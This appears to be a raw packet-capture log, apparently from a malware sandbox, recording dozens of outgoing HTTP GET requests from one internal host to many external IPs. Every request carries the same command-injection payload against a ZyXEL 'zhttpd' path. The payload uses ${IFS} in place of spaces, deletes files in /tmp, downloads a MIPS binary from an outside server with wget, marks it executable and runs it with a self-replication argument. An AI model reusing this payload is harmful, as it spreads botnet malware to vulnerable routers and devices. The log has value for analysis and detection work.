                                          Jan 14, 2024 15:46:06.797719002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2258192.168.2.2356360208.93.172.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797750950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2259192.168.2.2341400135.135.121.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797784090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2260192.168.2.2338864159.243.101.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797813892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2261192.168.2.235088442.126.14.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797847986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2262192.168.2.235308275.2.171.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797883034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2263192.168.2.2350870185.241.218.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797900915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2264192.168.2.235580631.151.56.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797902107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2265192.168.2.2348528211.198.133.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797941923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2266192.168.2.234432686.89.128.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797957897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2267192.168.2.2358594137.202.82.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.797991991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2268192.168.2.235157614.232.250.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798022985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2269192.168.2.2342116191.201.123.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798046112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2270192.168.2.235693434.92.248.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798068047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2271192.168.2.233943263.240.34.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798096895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2272192.168.2.235458648.227.217.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798100948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2273192.168.2.2352044120.236.192.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798121929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2274192.168.2.235591666.37.12.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798135042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2275192.168.2.2342556182.41.196.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798201084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2276192.168.2.2358264124.218.194.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798201084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2277192.168.2.2339350148.202.106.66443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798214912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2278192.168.2.233602632.137.24.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798264980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2279192.168.2.234738268.134.84.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798293114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2280192.168.2.235879439.87.164.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798329115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2281192.168.2.2341478119.105.205.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798347950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2282192.168.2.235413271.231.76.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798386097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2283192.168.2.235715039.215.42.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798424959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2284192.168.2.2348162117.214.98.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798432112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2285192.168.2.2353592104.196.113.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798482895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2286192.168.2.2354458177.113.121.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798490047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2287192.168.2.2340874110.162.101.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798513889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2288192.168.2.2359200158.82.48.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798554897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2289192.168.2.2350086106.225.200.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798554897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2290192.168.2.236077298.237.204.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798585892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2291192.168.2.2354680167.75.143.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.798588991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2292192.168.2.235191261.211.215.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.801160097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2293192.168.2.2342820205.1.99.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.801176071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2294192.168.2.235249857.108.113.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:06.801363945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2295192.168.2.234163080.255.233.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815444946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2296192.168.2.2336210168.218.229.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815454006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2297192.168.2.2345266128.21.155.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815485954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2298192.168.2.234149097.121.232.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815491915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2299192.168.2.233508276.144.117.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815541983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2300192.168.2.23573545.38.167.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815566063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2301192.168.2.2339234175.146.139.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815604925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2302192.168.2.2343152197.189.62.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815618992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2303192.168.2.2333092133.137.78.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815642118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2304192.168.2.233823436.61.58.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815675020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2305192.168.2.2354086134.21.194.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815699100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2306192.168.2.2357144140.189.103.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815728903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2307192.168.2.233929258.217.219.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815773010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2308192.168.2.2335506191.183.213.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815808058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2309192.168.2.2350866202.2.221.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815819025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2310192.168.2.2348552186.191.196.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815834999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2311192.168.2.2356898220.181.193.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815840006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2312192.168.2.235545282.16.100.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815871954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2313192.168.2.234140025.142.11.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815908909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2314192.168.2.2338972101.37.97.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815918922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2315192.168.2.2347958182.63.50.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815953016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2316192.168.2.2359254110.127.74.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.815963984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2317192.168.2.2349064152.91.106.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816014051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2318192.168.2.2346644144.236.159.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816041946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2319192.168.2.2346530173.170.248.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816087961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2320192.168.2.235869076.144.14.181443
                                          TimestampBytes transferredDirectionData
